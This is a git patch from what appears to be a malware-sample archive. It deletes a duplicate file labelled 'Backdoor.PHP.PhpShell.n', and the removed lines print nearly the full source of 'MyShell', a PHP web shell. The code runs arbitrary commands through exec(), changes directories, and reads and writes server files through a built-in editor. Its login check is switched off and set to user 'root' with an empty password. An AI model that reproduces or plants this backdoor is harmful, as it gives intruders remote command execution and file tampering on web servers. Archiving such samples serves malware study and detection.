From 333a19227950516c54c7a583c0ca83613a743f70 Mon Sep 17 00:00:00 2001
From: vxunderground <57078196+vxunderground@users.noreply.github.com>
Date: Thu, 29 Oct 2020 23:52:25 -0500
Subject: [PATCH] Delete Backdoor.PHP.PhpShell.n
dup
---
PHP/Backdoor.PHP.PhpShell.n | 420 ------------------------------------
1 file changed, 420 deletions(-)
delete mode 100644 PHP/Backdoor.PHP.PhpShell.n
diff --git a/PHP/Backdoor.PHP.PhpShell.n b/PHP/Backdoor.PHP.PhpShell.n
deleted file mode 100644
index 53b381ff..00000000
--- a/PHP/Backdoor.PHP.PhpShell.n
+++ /dev/null
@@ -1,420 +0,0 @@
-
- based on the original program phpShell by Martin Geisler
-
- This program is free software; you can redistribute it and/or
- modify it under the terms of the GNU General Public License
- as published by the Free Software Foundation; either version 2
- of the License, or (at your option) any later version.
-
- This program is distributed in the hope that it will be useful,
- but WITHOUT ANY WARRANTY; without even the implied warranty of
- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- GNU General Public License for more details.
-
- You can get a copy of the GNU General Public License from this
- address: http://www.gnu.org/copyleft/gpl.html#SEC1
- You can also write to the Free Software Foundation, Inc., 59 Temple
- Place - Suite 330, Boston, MA 02111-1307, USA.
-*/
-
-#$selfSecure enables built-in authenticate feature. This must be 0 in order to
-#use .htaccess file or other alternative method to control access to MyShell.
-#Set up your user and password using $shellUser and $shellPswd.
-#DO NOT TURN THIS OFF UNLESS YOU HAVE AN ALTERNATE METHOD TO PROTECT
-#ACCESS TO THE SCRIPT.
-
-$selfSecure = 0;
-$shellUser = "root";
-$shellPswd = "";
-
-#$adminEmail is the email address to send warning notifications in case
-#someone tries to access the script and fails to provide correct user and
-#password. This only works if you have $selfSecure enabeled.
-
-$adminEmail = "wmmoney@nc.ru";
-
-#$fromEmail is the email address warning messages are sended from.
-#This defaults to the server admin, but you can change
-#to any address you want i.e.: noreplay@yourdomain.com
-#This only works if you have $selfSecure enabeled.
-
-$fromEmail = $HTTP_SERVER_VARS["SERVER_ADMIN"];
-
-#$dirLimit is the top directory allowed to change when using cd command
-#or the form selector. Any attempt to change to a directory up to this
-#level bounces MyShell to this directory. i.e.: $dirLimit = "/home";
-#It is a good practice to set it to $DOCUMENT_ROOT using:
-#$dirLimit = $DOCUMENT_ROOT;
-#If you want to have access to all server directories leave it blank.
-#WARNING: Althought a user won't be able to snoop on directories above
-#this level using MyShell, he/she will still be able to excecute
-#commands on any directory where Webserver has permission,
-#i.e.: mkdir /tmp/mydir or cat /home/otheruser/.htaccess.
-
-$dirLimit = "";
-
-#$autoErrorTrap Enable automatic error traping if command returns error.
-#Bear in mind that MyShell executes the command a second time in order to
-#trap the stderr. This shouldn't be a problem in most cases.
-#If you turn it off, you'll have to select either to trap stderr or not for
-#every command you excecute.
-
-$autoErrorTrap = 1;
-
-#$voidCommands is the list of commands that MyShell won't run by any means.
-#It defaults to known problematic commands from a web interface like pico,
-#top, xterm but also it can include specific commands you don't want to
-#be excecuted from MyShell, i.e.: dig, ping, info, kill etc.
-
-$voidCommands = array("top","xterm","su","vi","pico","netscape");
-
-#$TexEd Built-in Text Editor prefered name. This is the command you'll use
-#to invoke MyShell's built in text editor.
-# If you are used to type pico or vi for your fav text editor,
-#change this to your please. i.e.:
-# $TexEd = "pico";
-#will allow you to type 'pico config.php' to edit the file config.php
-#MyShell's text editor do not support usual commands in pico, vi etc.
-#Don't forget to take off this command from the $voidCommands list
-$TexEd = "edit";
-
-#$editWrap selects to use or not wrap in the editor's textarea. Wrap OFF
-#is usefull when you have to edit files with long lines, i.e.: in php code
-#files, because otherwise it is no easy to distinguish a real new line (CR)
-#from a wraped one. If you prefer to stick to the default wraped mode of
-#TEXTAREA just leave this blank i.e.: $editWrap="".
-$editWrap ="wrap='OFF'";
-
-#Cosmetic defaults.
-
-$termCols = 80; //Default width of the output text area
-$termRows = 20; //Default heght of the output text area
-$bgColor = "#000000"; //background color
-$bgInputColor = "#333333"; //color of the input field
-$outColor = "#00BB00"; //color of the text output from the server
-$textColor = "#009900"; //color of the hard texts of the terminal
-$linkColor = "#00FF00"; //color of the links
-
-/************** No customize needed from this point *************/
-
-$MyShellVersion = "MyShell 1.1.0 build 20010923";
-if ($command&&get_magic_quotes_gpc())$command=stripslashes($command);
-if($selfSecure){
- if (($PHP_AUTH_USER!=$shellUser)||($PHP_AUTH_PW!=$shellPswd)) {
- Header('WWW-Authenticate: Basic realm="MyShell"');
- Header('HTTP/1.0 401 Unauthorized');
- echo "
-
- $MyShellVersion - Access Denied
-
- Access denied
- A warning message have been sended to the administrator
-
- $MyShellVersion";
- if(isset($PHP_AUTH_USER)){
- $warnMsg ="
- This is $MyShellVersion
- installed on: http://".$HTTP_SERVER_VARS["HTTP_HOST"]."$PHP_SELF
- just to let you know that somebody tryed to access
- the script using wrong username or password:
-
- Date: ".date("Y-m-d H:i:s")."
- IP: ".$HTTP_SERVER_VARS["REMOTE_ADDR"]."
- User Agent: ".$HTTP_SERVER_VARS["HTTP_USER_AGENT"]."
- username used: $PHP_AUTH_USER
- password used: $PHP_AUTH_PW
-
- If this is not the first time it happens,
- please consider either to remove MyShell
- from your system or change it's name or
- directory location on your server.
-
- Regards
- The MyShell dev team
- ";
- mail($adminEmail,"MyShell Warning - Unauthorized Access",$warnMsg,
- "From: $fromEmail\nX-Mailer:$MyShellVersion AutoWarn System");
- }
- exit;
- }
-}
-//Function that validate directories
-function validate_dir($dir){
- GLOBAL $dirLimit;
- if($dirLimit){
- $cdPos = strpos($dir,$dirLimit);
- if ((string)$cdPos == "") {
- $dir = $dirLimit;
- $GLOBALS["shellOutput"] = "You are not allowed change to directories above $dirLimit\n";
- }
- }
- return $dir;
-}
-
-// Set working directory.
-if (isset($work_dir)) {
- //A workdir has been asked for - we chdir to that dir.
- $work_dir = validate_dir($work_dir);
- @chdir($work_dir) or
- ($shellOutput = "MyShell: can't change directory. Permission denied\nSwitching back to $DOCUMENT_ROOT\n");
- $work_dir = exec("pwd");
-}
-else{
- // No work_dir - we chdir to $DOCUMENT_ROOT
- $work_dir = validate_dir($DOCUMENT_ROOT);
- chdir($work_dir);
- $work_dir = exec("pwd");
-}
-
-//Now we handle files if we are in Edit Mode
-if($editMode && ($command||$editCancel))$editMode=false;
-if($editMode){
- if($editSave ||$editSaveExit){
- if(function_exists(ini_set))ini_set("track_errors","1");
- if($fp=@fopen($file,"w")){
- if(get_magic_quotes_gpc())$shellOut=stripslashes($shellOut);
- fputs($fp,$shellOut);
- fclose($fp);
- $command = $TexEd." ".$file;
- if($editSaveExit) {
- $command="";
- $shellOutput="MyShell: $file: saved";
- $editMode=false;
- }
- }
- else {
- $command="";
- $shellOutput="MyShell: Error while saving $file:\n$php_errormsg\nUse back button to recover your changes.";
- $errorSave=true;
- }
- }
-}
-
-//Separate command(s) and arguments to analize first command
-$input=explode(" ",$command);
-
-while (list ($key, $val) = each ($voidCommands)) {
- if($input[0]==$val){
- $voidCmd = $input[0];
- $input[0]="void";
- }
-}
-switch($input[0]){
- case "cd":
- $path=$input[1];
- if ($path==".."){
- $work_dir=strrev(substr(strstr(strrev($work_dir), "/"), 1));
- if ($work_dir == "") $work_dir = "/";
- }
- elseif (substr($path,0,1)=="/")$work_dir=$path;
- else $work_dir=$work_dir."/".$path;
- $work_dir = validate_dir($work_dir);
- @chdir($work_dir) or ($shellOutput = "MyShell: can't change directory.\n$work_dir: does not exist or permission denied");
- $work_dir = exec("pwd");
- $commandBk = $command;
- $command = "";
- break;
- case "man":
- exec($command,$man);
- if($man){
- $codes = ".".chr(8);
- $manual = implode("\n",$man);
- $shellOutput = ereg_replace($codes,"",$manual);
- $commandBk = $command;
- $command = "";
- }
- else $stderr=1;
- break;
- case "cat":
- exec($command,$cat);
- if($cat){
- $text = implode("\n",$cat);
- $shellOutput = htmlspecialchars($text);
- $commandBk = $command;
- $command = "";
- }
- else $stderr=1;
- break;
- case "more":
- exec($command,$cat);
- if($cat){
- $text = implode("\n",$cat);
- $shellOutput = htmlspecialchars($text);
- $commandBk = $command;
- $command = "";
- }
- else $stderr=1;
- break;
- case $TexEd:
- if(file_exists($input[1])){
- exec("cat ".$input[1],$cat);
- $text = implode("\n",$cat);
- $shellOutput = htmlspecialchars($text);
- $fileOwner = posix_getpwuid(fileowner($input[1]));
- $filePerms = sprintf("%o", (fileperms($input[1])) & 0777);
- $fileEditInfo = " ::::::: Owner: ".$fileOwner["name"]." Permissions: $filePerms";
- }
- else $fileEditInfo = " ::::::: NEW FILE";
- $currFile = $input[1];
- $editMode = true;
- $command = "";
- break;
- case "void":
- $shellOutput = "MyShell: $voidCmd: void command for MyShell";
- $commandBk = $command;
- $command = "";
-}
-
-//Now we prepare the webpage
-if(!$oCols)$oCols=$termCols;
-if(!$oRows)$oRows=$termRows;
-if($editMode)$focus="shellOut.focus()";
-else $focus="command.select()";
-//WhoamI
-if(!$whoami)$whoami=exec("whoami");
-?>
-
-
-<?echo $MyShellVersion?>
-
-
->
-
-
-
\ No newline at end of file